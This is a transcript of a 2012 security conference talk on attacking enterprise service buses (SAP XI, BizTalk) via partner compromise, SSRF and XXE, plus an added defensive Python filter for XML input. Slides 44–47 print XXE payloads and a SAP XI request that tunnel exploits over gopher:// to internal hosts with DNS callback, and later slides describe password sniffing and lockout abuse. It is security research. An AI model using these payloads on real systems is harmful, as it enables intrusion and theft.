Polyakov how i will break your enterprise. esb security and more

Published on: Mar 4, 2016
Source: www.slideshare.net


Transcripts - Polyakov how i will break your enterprise. esb security and more

  • 1. Invest in security to secure investments. How I will break your enterprise: ESB Security and more. Alexander Polyakov, CTO at ERPScan (Digital Security). November 19, 2012
  • 2. Me: business application security expert
  • 3. The question: how to break a secure enterprise network?
  • 4. Hint: what do we do if we have a secure target website on a hosting service?
  • 5. Answer
    • We can do the same for companies
    • Just Google for the target company’s suppliers and customers
    • Pwn one of them
    • Find a link to the secured company
  • 6. But how?
    • Almost all big companies are connected to each other
    • To make their business work
    • For example, companies generate automatic Payment Orders from one business application to another
    • They use some kind of middleware to do this
    • Sometimes, those systems can be open to the Internet
    • Mostly not
    • But they must be open for partners
    • What kind of systems are you talking about?
  • 7. Enterprise Service Bus
  • 8. ESB
  • 9. What they look like
  • 10. What do we know about their security?
    • Nothing – actually, very little info
    • They can have vulnerabilities – a lot of vulnerabilities
    • Because they are complex – very complex
    • And very customized – because it’s more of a framework than software
  • 11. Some ESB problems. ESB is all about DATA
    • Missing encryption – not so easy to configure, so mostly unencrypted – a lot of swag data transferring
    • Support for a lot of interfaces and protocols – many points of failure – can be used as a proxy to attack other systems
    • And, of course, all the other software security problems
  • 12. If we attack ESB from a connected company
    • We have one bonus
    • As we have already pwn’d the connected company
    • We have auth data to connect to ESB interfaces
    • But our goal is to jump through ESB to the target company
  • 13. IBM WebSphere MQ
    • Middleware application for handling messaging within an enterprise network
    • The first ESB that was publicly researched for vulnerabilities (in 2007)
    • A great presentation by MWRLab
    • Whitepaper with 87 pages of MQ insights!
    • http://labs.mwrinfosecurity.com/assets/141/mwri_websphere-mq-security-white-paper-part1_2008-05-06.pdf
  • 14. SAP NetWeaver PI / XI
    • Tool for process integration / system integration
    • Has SOAP Adapter with default services
    • We found one that was accessible without authorizations: /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG
    • Accepts XML: any XML-based attack (patched by SAP Note 1707494)
    • More about this later
  • 15. SAP NetWeaver PI
  • 16. Microsoft BizTalk
    • For the same purpose
    • ESB toolkit used to be additional software, but in BizTalk 2013, it is integrated
    • 0 results for “BizTalk Security” in search engines
    • Doesn’t have default services with auth bypass :(
  • 17. Has anybody really used it?
  • 18. BizTalk map (diagram: BizTalk in the middle, connecting the company’s external web portal, suppliers, HR, customers, data warehouse, banks, logistics, insurance, ERP, partners, billing and branches). Picture taken from http://habrahabr.ru/post/94861/
  • 19. Microsoft BizTalk: how it works
    • You send data to a virtual “Input port”
    • The port can be anything, from a file to an FTP folder or a web service or something else
    • BizTalk takes this data and transforms it (Orchestration)
    • There are special tools to perform the transformation
    • Then the packet is sent to an “Output port”
    • So, the simple transformation can have common XML issues depending on the application
  • 20. Microsoft BizTalk: different ways to transfer data
    – Simple transfer (static binding)
    – Bindings (dynamic binding)
    – Itinerary
  • 21. BizTalk Transformation example
  • 22. BizTalk Transformation example
    • The operation is performed by a functoid
    • There are a lot of functoids with math and logical stuff
    • One of the funniest to attack is the Database Lookup functoid
    • If you find it in some XML, you can connect to external DBs
    • Sometimes with integrated security (trust):
      Provider=msdaora;Data Source=thisdb;Persist Security Info=False;Integrated Security=Yes;
    • Also supported: Sybase, Oracle, MySQL, Informix, FoxPro, Firebird, Exchange, Excel, DBase, DB2, Access …
  • 23. BizTalk Binding. Virtual ports must be linked to the real ports they call (binding)
    • Static binding: a static port is already configured at the time of deployment to use a transport so as to deliver messages to a specific external endpoint. A transport type selects an adapter and a URI address.
    • Direct binding can also be used to send messages directly into the message box. External binding configuration cannot be used with directly bound orchestration ports.
    • Dynamic binding: transport types and locations are dynamically selected by dynamic ports. The orchestration port is responsible for having the required properties created within the message context.
  • 24. A packet with dynamic binding (any ideas?)
  • 25. Exploiting dynamic binding easily
  • 26. BizTalk Binding: use your imagination
    • XPATH
    • STATIC
    • Business Rules Engine (BRE)
    • BRI
    • UDDI
    • UDDI3
    • LDAP
    • MQS
    • FTP
    • FILE
    • …
  • 27. BizTalk Itinerary: full control over the packet
    • Itinerary-based routing simplifies the development of enterprise-level messaging
    • In simple words, an itinerary is a sequence of operations performed on a message
    • An itinerary consists of the list of services to execute (which can contain routing, transformation, and custom services) and the configuration information required to resolve the metadata necessary to execute each of these services
    • For example, it may instruct the service to perform a UDDI or Business Rules Engine (BRE) lookup for information about a specific target endpoint to which it will route the message
    • A huge area to have fun
  • 28. Searching for BizTalk applications
    • OK, cool, but how can we find all this stuff?
    • Apart from sniffing?
    • Answer: UDDI
    • Database of all web services installed on BizTalk
    • Just look for ports 80 or 8080 for /uddi or /uddipublic
    • Add WSDL to the URL :)
  • 29. Bingo - Bongo!
  • 30. And one more thing: don’t forget about web.config
  • 31. So, you are inside the company’s network. Now what?
  • 32. Secure corporate network (diagram: the Internet, the corporate network, the ERP network and the industrial network as separate segments)
  • 33. But wait. There must be some links!
  • 34. Real corporate network (diagram: the same four segments, now with links between them)
  • 35. And… attackers can use them!
  • 36. Corporate network attack scenario (diagram: the Internet, the corporate network, the ERP network and the industrial network, with the attack path between them)
  • 37. But how?
  • 38. Supa Sexy Robo Fashion
  • 39. SSRF proxy attack (diagram: Packet A is sent to the corporate network carrying Packet B, which the receiving server forwards into the secure network)
  • 40. SSRF
    • A possibility to use a vulnerable server as a proxy to attack other servers located in a secure subnetwork
    • A way to jump from one subnetwork to another
    • A lot of examples of how to run an SSRF attack
    • We can use any popular business application to run SSRF
    • More details about SSRF
      – Part 1: http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf
      – Part 2: http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf
  • 41. Exploiting SSRF. For every SSRF attack, there must be at least 2 vulnerabilities to successfully trigger the attack:
    • First vulnerability – functionality in some service on Server A which allows us to send remote packets (for other types of SSRF)
    • Second vulnerability
      – Vuln. in a service on Server B (for remote SSRF)
      – Vuln. in a localhost service on Server A (for local SSRF)
      – Vuln. in a client app. on Server A (for back-connect SSRF)
  • 42. Multiprotocol calls (in XML)
    • A lot of XML stuff in ESB
    • XML seems to be the new TCP
    • Almost all big projects use XML-based data transfer
    • There are a lot of XML-based protocols with different options to call external resources and thus conduct SSRF attacks
    • There is at least one element type which fits almost all XML-based schemas. The type is: xsd:anyURI
    • URIs also encompass URLs of other schemes (e.g., FTP, gopher, telnet), as well as URNs
    • Popular URIs: http:// ftp:// telnet:// …
  • 43. Multiprotocol calls in XML
    • XML – XML External Entity – XSD definition
    • XML Encryption
    • XML Signature
    • WS-Policy
    • From WS-Security
    • WS-Addressing
    • XBRL
    • OData (edmx) – OData External Entity – other
    • BPEL
    • StratML
    • …
    • Details: http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf
  • 44. Exploiting Gopher (example)
      <?xml version="1.0" encoding="ISO-8859-1"?>
      <!DOCTYPE foo [
        <!ELEMENT foo ANY >
        <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >
      ]>
      <foo>&date;</foo>
    What will happen?
  • 45. XXE Tunneling (example)
    • Server A (Portal or XI), 192.168.0.1, receives Packet A:
      POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
      Host: 192.168.0.1:8000
      <?xml version="1.0" encoding="ISO-8859-1"?>
      <!DOCTYPE foo [
        <!ELEMENT foo ANY >
        <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >
      ]>
      <foo>&date;</foo>
    • Server B (ERP, HR, BW etc.), 172.16.0.1, port 3300, receives AAAAAAAAAAAAA – the same as running telnet 172.16.0.1 3300 and typing it in
  • 46. XXE Tunneling (hint 2)
    • Next step is to pack the exploit in Packet B inside Packet A
    • We need to insert non-printable symbols
    • God bless gopher; it supports URL-encoding like HTTP
    • It will also help us evade IDS systems
    • Packet A:
      POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
      Host: sapserver.com:80
      Content-Length: 7730
      <?xml version="1.0" encoding="ISO-8859-1"?>
      <!DOCTYPE foo [
        <!ELEMENT foo ANY >
        <!ENTITY date SYSTEM "gopher://[Urlencoded Packet B]" >
      ]>
      <foo>&date;</foo>
  • 47. XXE Tunneling to Buffer Overflow (result)
    • Server A on the Internet (SAP XI, http://company.com) receives Packet A:
      POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
      Host: sapserver.com:80
      <?xml version="1.0" encoding="ISO-8859-1"?>
      <!DOCTYPE foo [
        <!ELEMENT foo ANY >
        <!ENTITY date SYSTEM "gopher://[packetB]" >
      ]>
      <foo>&date;</foo>
    • Packet B: the exploit, delivered to Server B in the DMZ (172.16.0.1)
    • Packet C: the command-and-control response from the shellcode to the attacker, carried as a DNS payload over the DNS protocol, which is an allowed service for outbound connections
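As an added example (not from the slides), here is the kind of boundary check a defender can put in front of an ESB/SOAP adapter; it covers both the xsd:anyURI schemes of slides 42-43 and the URL-encoded gopher:// trick of slide 46. SOAP 1.1 forbids a DTD in a message, so any DOCTYPE is rejected before the real parser sees it, and every URI-typed value is percent-decoded before its scheme is compared against an allowlist. The function names, the allowlist and the sample messages (including the WS-Addressing ReplyTo header) are constructed for this example.

```python
# Added example: pre-parse gate for XML entering an ESB/SOAP adapter (not from the slides).
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote

ALLOWED_SCHEMES = {"http", "https"}
# <!ENTITY name SYSTEM "uri"> or <!ENTITY name PUBLIC "pubid" "uri">, either quote style
ENTITY_RE = re.compile(
    r'<!ENTITY\s+(?:%\s+)?(?P<name>[^\s>]+)\s+'
    r'(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|\'[^\']*\'))\s+'
    r'(?:"(?P<dq>[^"]*)"|\'(?P<sq>[^\']*)\')', re.IGNORECASE)
HIER_URI_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9+.\-]*)://')

def scheme_of(value):
    """Scheme of a hierarchical URI after percent-decoding, or None if not one."""
    m = HIER_URI_RE.match(unquote(value))
    return m.group(1).lower() if m else None

def external_entities(xml_text):
    """External entity declarations in the DTD as [(name, uri, scheme)]."""
    out = []
    for m in ENTITY_RE.finditer(xml_text):
        uri = m.group("dq") if m.group("dq") is not None else m.group("sq")
        out.append((m.group("name"), uri, scheme_of(uri)))
    return out

def offending_uris(xml_text):
    """Text and attribute values that are URIs with a disallowed scheme (DTD-free input only)."""
    hits = []
    for el in ET.fromstring(xml_text).iter():
        for v in [el.text or ""] + list(el.attrib.values()):
            s = scheme_of(v)
            if s and s not in ALLOWED_SCHEMES:
                hits.append((el.tag, v.strip(), s))
    return hits

def inspect_message(xml_text):
    """Return (accepted, reasons); SOAP 1.1 forbids a DTD, so any DOCTYPE is rejected outright."""
    reasons = []
    if re.search(r"<!DOCTYPE", xml_text, re.IGNORECASE):
        reasons.append("DOCTYPE present (forbidden in SOAP messages)")
        for name, uri, s in external_entities(xml_text):
            reasons.append(f"external entity {name!r} -> {uri} (scheme {s})")
        return False, reasons
    for tag, v, s in offending_uris(xml_text):
        reasons.append(f"{tag}: scheme {s!r} not allowed: {v}")
    return (not reasons), reasons

# Constructed samples: the entity payload shape from the slides, and a SOAP header whose
# WS-Addressing ReplyTo carries a percent-encoded gopher:// URI to an internal host.
XXE_SAMPLE = ('<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY >'
              '<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]><foo>&date;</foo>')
SOAP_SAMPLE = ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa='
               '"http://www.w3.org/2005/08/addressing"><s:Header><wsa:ReplyTo><wsa:Address>'
               'gopher%3A%2F%2F172.16.0.1%3A3300%2Fx</wsa:Address></wsa:ReplyTo></s:Header><s:Body/></s:Envelope>')
CLEAN_SAMPLE = SOAP_SAMPLE.replace("gopher%3A%2F%2F172.16.0.1%3A3300%2Fx", "https://partner.example/reply")
```

The gate is a coarse first line only: the parser behind it should still have DTD processing and external entity resolution switched off, because a regex-level check cannot see through every encoding a parser accepts.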
  • 48. Great, we can jump from one secured network to another. What’s next?
  • 49. We are inside, so what?
    • All your systems have password lock policies
    • Because we are in a secure company, rrright?
    • And secure applications send passwords securely
    • While the user is authenticating
  • 50. We are inside, so what? (same slide, with the last point stressed: while the user is authenticating!)
  • 51. OK, but what about creating a new user?
  • 52. Create new user, MsSQL
  • 53. The same applies when a user is changing their password due to security policies
  • 54. Change user password, MsSQL
  • 55. More than real: 5000 users change their password every 90 days => every hour, 2 users change their passwords
  • 56. If we don’t want to wait, we can brute-force until the account is locked; then the administrator will unlock it and, in 99% of cases, change the pass
  • 57. Why MsSQL?
    • Just because I sometimes want to speak about something other than SAP and Oracle, so let it be MS
    • It’s everybody’s problem
  • 58. They have the same problems
    • MySQL
    • Oracle console
    • Oracle Enterprise Manager
    • MsSQL Console
    • MsSQL Enterprise Manager
    • etc…
  • 59. I don’t want user interaction
    • We need some kind of user interaction
    • But that’s not so tasty
    • Let’s look at something else
  • 60. What about them? …And 50 more
  • 61. Issue tracking systems
    • No, I’m not talking about XSS/SQLI/LFI/OMG/WTF/ETC
    • Of course they exist, but
    • We are in a “very-very secure” company, which has a WAF
    • And HTTPS
    • Really secure HTTPS (yes, Moxie)
  • 62. Any ideas? :)
  • 63. Password change e-mail
  • 64. Sniff mail requests: mail requests are unencrypted
  • 65. Access to the kingdom
  • 66. So… because they usually have a wiki where all the neat stuff is stored, like keys to other systems
  • 67. Questions? Web: www.dsec.ru, www.erpscan.com. E-mail: a.polyakov@dsec.ru. Twitter: @sh2kerr. Big thanks to Nikolay Mescherin :)
